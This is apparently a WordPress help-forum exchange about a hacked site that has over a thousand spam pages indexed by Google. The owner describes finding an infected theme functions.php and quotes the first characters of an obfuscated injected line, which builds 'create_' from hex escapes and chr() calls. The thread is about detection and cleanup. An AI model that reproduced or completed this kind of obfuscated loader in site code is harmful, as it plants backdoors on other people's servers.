 * > You can remove those links using google webmaster tools
 * There is over 1,000+ spam website links showing in google site search
 * Can you please help with some more detail on how to remove all of the spoofed
   pages under my domain through google webmaster tools (yes I have an account already)
 * What is the procedure, how do I make sure they are all removed and how long does
   it take to obliterate these spam pages from google?
 * Thank you again

 * Thanks for those replies, much appreciated.
 * I found one hacked file today – the **functions.php** in the root of the theme
   folder I am using.
 * First line of the file had a long line of (to me) gibberish code, starts with:
   **
   $eylrme=”\x63″.”r”.chr(101).chr(97).”\x74″.”e”.chr(95)** etc
 * Checked the same file in the original theme and it didn’t appear so that clinched
   it.
 * Currently fixing the site now, see how it goes.
    Hope the above helps someone
   else
